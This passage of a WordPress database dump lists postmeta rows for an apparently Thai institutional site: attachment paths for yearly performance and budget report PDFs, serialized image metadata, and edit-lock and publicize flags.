(5404, 1731, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575011721;s:7:\"payload\";a:0:{}}}'),
(5405, 1734, '_wp_attached_file', '2018/03/รายงานผล-การปฏิบัติงาน-และการใช้จ่ายเงินงบประมาณ-2553.pdf'),
(5406, 1735, '_wp_attached_file', '2018/03/รายงานผล-การปฏิบัติงาน-และการใช้จ่ายเงินงบประมาณ-2554.pdf'),
(5407, 1736, '_wp_attached_file', '2018/03/รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ-2556.pdf'),
(5408, 1738, '_wp_attached_file', '2018/03/รายงานผลปี-2555.pdf'),
(5409, 1741, '_edit_lock', '1574910570:14'),
(5410, 1741, '_edit_last', '14'),
(5411, 1742, '_wp_attached_file', '2018/03/5-3-2561-13-45-54-1.jpg'),
(5412, 1742, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:195;s:6:\"height\";i:238;s:4:\"file\";s:31:\"2018/03/5-3-2561-13-45-54-1.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"5-3-2561-13-45-54-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5413, 1743, '_wp_attached_file', '2018/03/7-3-2561-14-43-12-1.jpg'),
(5414, 1743, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:583;s:6:\"height\";i:154;s:4:\"file\";s:31:\"2018/03/7-3-2561-14-43-12-1.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"7-3-2561-14-43-12-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"7-3-2561-14-43-12-1-300x79.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:79;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:31:\"7-3-2561-14-43-12-1-400x106.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:106;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5415, 1741, '_publicize_pending', '1'),
(5416, 1741, '_hide_featured', NULL),
(5417, 1745, '_edit_lock', '1531193978:3'),
(5418, 1745, '_edit_last', '3'),
(5419, 1745, '_publicize_pending', '1'),
(5420, 1745, '_hide_featured', NULL),
(5421, 1751, '_edit_lock', '1560423388:14'),
(5422, 1751, '_edit_last', '14'),
(5423, 1751, '_publicize_pending', '1'),
(5424, 1751, '_hide_featured', NULL),
(5425, 1753, '_edit_lock', '1629872829:14'),
(5426, 1753, '_edit_last', '14'),
(5427, 1753, '_publicize_pending', '1'),
(5428, 1753, '_hide_featured', NULL),
(5429, 1755, '_wp_attached_file', '2018/03/12-3-2561-14-57-21.jpg'),
(5430, 1755, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:574;s:6:\"height\";i:318;s:4:\"file\";s:30:\"2018/03/12-3-2561-14-57-21.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"12-3-2561-14-57-21-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"12-3-2561-14-57-21-300x166.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:166;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"12-3-2561-14-57-21-400x222.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:222;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5431, 1757, '_edit_lock', '1532418134:3'),
(5432, 1757, '_edit_last', '3'),
(5433, 1757, '_publicize_pending', '1'),
(5434, 1757, '_hide_featured', NULL),
(5436, 1762, '_edit_lock', '1570419235:14'),
(5437, 1762, '_edit_last', '14'),
(5440, 1764, '_wp_attached_file', '2018/03/13-3-2561-11-07-01.jpg'),
(5441, 1764, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:579;s:6:\"height\";i:154;s:4:\"file\";s:30:\"2018/03/13-3-2561-11-07-01.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"13-3-2561-11-07-01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"13-3-2561-11-07-01-300x80.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:80;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"13-3-2561-11-07-01-400x106.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:106;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5442, 1765, '_wp_attached_file', '2018/03/13-3-2561-12-00-36.jpg'),
(5443, 1765, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:192;s:6:\"height\";i:239;s:4:\"file\";s:30:\"2018/03/13-3-2561-12-00-36.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"13-3-2561-12-00-36-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5444, 1766, '_wp_attached_file', '2018/03/13-3-2561-12-01-14.jpg'),
(5445, 1766, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:190;s:6:\"height\";i:239;s:4:\"file\";s:30:\"2018/03/13-3-2561-12-01-14.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"13-3-2561-12-01-14-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5446, 1767, '_wp_attached_file', '2018/03/13-3-2561-11-07-18.jpg'),
(5447, 1767, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:578;s:6:\"height\";i:161;s:4:\"file\";s:30:\"2018/03/13-3-2561-11-07-18.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"13-3-2561-11-07-18-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"13-3-2561-11-07-18-300x84.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"13-3-2561-11-07-18-400x111.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:111;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5448, 1768, '_wp_attached_file', '2018/03/13-3-2561-11-06-24.jpg'),
(5449, 1768, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:489;s:6:\"height\";i:317;s:4:\"file\";s:30:\"2018/03/13-3-2561-11-06-24.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"13-3-2561-11-06-24-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"13-3-2561-11-06-24-300x194.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:194;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"13-3-2561-11-06-24-400x259.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:259;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5450, 1769, '_wp_attached_file', '2018/03/13-3-2561-12-01-47.jpg'),
(5451, 1769, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:193;s:6:\"height\";i:238;s:4:\"file\";s:30:\"2018/03/13-3-2561-12-01-47.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"13-3-2561-12-01-47-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5452, 1770, '_wp_attached_file', '2018/03/13-3-2561-11-09-38.jpg'),
(5453, 1770, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:586;s:6:\"height\";i:160;s:4:\"file\";s:30:\"2018/03/13-3-2561-11-09-38.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"13-3-2561-11-09-38-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"13-3-2561-11-09-38-300x82.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:82;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"13-3-2561-11-09-38-400x109.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:109;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5454, 1771, '_wp_attached_file', '2018/03/13-3-2561-11-11-58.jpg'),
(5455, 1771, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:824;s:6:\"height\";i:323;s:4:\"file\";s:30:\"2018/03/13-3-2561-11-11-58.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"13-3-2561-11-11-58-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"13-3-2561-11-11-58-300x118.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:118;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"13-3-2561-11-11-58-768x301.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:301;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"13-3-2561-11-11-58-400x157.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:157;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5456, 1772, '_wp_attached_file', '2018/03/13-3-2561-12-01-31.jpg'),
(5457, 1772, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:193;s:6:\"height\";i:240;s:4:\"file\";s:30:\"2018/03/13-3-2561-12-01-31.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"13-3-2561-12-01-31-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5458, 1773, '_wp_attached_file', '2018/03/13-3-2561-11-09-17.jpg'),
(5459, 1773, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:592;s:6:\"height\";i:165;s:4:\"file\";s:30:\"2018/03/13-3-2561-11-09-17.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"13-3-2561-11-09-17-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"13-3-2561-11-09-17-300x84.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"13-3-2561-11-09-17-400x111.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:111;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5460, 1774, '_wp_attached_file', '2018/03/13-3-2561-11-06-09.jpg'),
(5461, 1774, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:265;s:6:\"height\";i:326;s:4:\"file\";s:30:\"2018/03/13-3-2561-11-06-09.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"13-3-2561-11-06-09-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"13-3-2561-11-06-09-244x300.jpg\";s:5:\"width\";i:244;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"13-3-2561-11-06-09-244x300.jpg\";s:5:\"width\";i:244;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5462, 1775, '_wp_attached_file', '2018/03/13-3-2561-12-02-32.jpg'),
(5463, 1775, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:194;s:6:\"height\";i:239;s:4:\"file\";s:30:\"2018/03/13-3-2561-12-02-32.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"13-3-2561-12-02-32-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5464, 1776, '_wp_attached_file', '2018/03/13-3-2561-11-12-21.jpg'),
(5465, 1776, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:578;s:6:\"height\";i:160;s:4:\"file\";s:30:\"2018/03/13-3-2561-11-12-21.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"13-3-2561-11-12-21-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"13-3-2561-11-12-21-300x83.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:83;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"13-3-2561-11-12-21-400x111.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:111;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5466, 1777, '_wp_attached_file', '2018/03/13-3-2561-11-18-49.jpg'),
(5467, 1777, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:659;s:6:\"height\";i:315;s:4:\"file\";s:30:\"2018/03/13-3-2561-11-18-49.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"13-3-2561-11-18-49-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"13-3-2561-11-18-49-300x143.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:143;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"13-3-2561-11-18-49-400x191.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:191;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5468, 1778, '_wp_attached_file', '2018/03/13-3-2561-12-03-05.jpg'),
(5469, 1778, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:192;s:6:\"height\";i:237;s:4:\"file\";s:30:\"2018/03/13-3-2561-12-03-05.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"13-3-2561-12-03-05-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5470, 1779, '_wp_attached_file', '2018/03/13-3-2561-11-28-10.jpg'),
(5471, 1779, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:581;s:6:\"height\";i:164;s:4:\"file\";s:30:\"2018/03/13-3-2561-11-28-10.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"13-3-2561-11-28-10-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"13-3-2561-11-28-10-300x85.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"13-3-2561-11-28-10-400x113.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:113;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5472, 1780, '_wp_attached_file', '2018/03/13-3-2561-11-32-42.jpg'),
(5473, 1780, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:478;s:6:\"height\";i:323;s:4:\"file\";s:30:\"2018/03/13-3-2561-11-32-42.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"13-3-2561-11-32-42-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"13-3-2561-11-32-42-300x203.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:203;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"13-3-2561-11-32-42-400x270.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5474, 1762, '_publicize_pending', '1'),
(5475, 1762, '_hide_featured', NULL),
(5476, 1784, '_edit_lock', '1531714104:3'),
(5477, 1784, '_edit_last', '3'),
(5478, 1784, '_publicize_pending', '1'),
(5479, 1784, '_hide_featured', NULL),
(5480, 1786, '_edit_lock', '1520922131:3'),
(5481, 1786, '_edit_last', '3'),
(5482, 1786, '_publicize_pending', '1'),
(5483, 1786, '_hide_featured', NULL),
(5484, 1788, '_edit_lock', '1520922231:3'),
(5485, 1788, '_edit_last', '3'),
(5486, 1788, '_publicize_pending', '1'),
(5487, 1788, '_hide_featured', NULL),
(5488, 1790, '_edit_lock', '1531195071:3'),
(5489, 1790, '_edit_last', '3'),
(5490, 1790, '_publicize_pending', '1'),
(5491, 1790, '_hide_featured', NULL),
(5492, 1792, '_edit_lock', '1534218184:3'),
(5493, 1792, '_edit_last', '3'),
(5494, 1793, '_wp_attached_file', '2018/03/13-3-2561-12-02-47.jpg'),
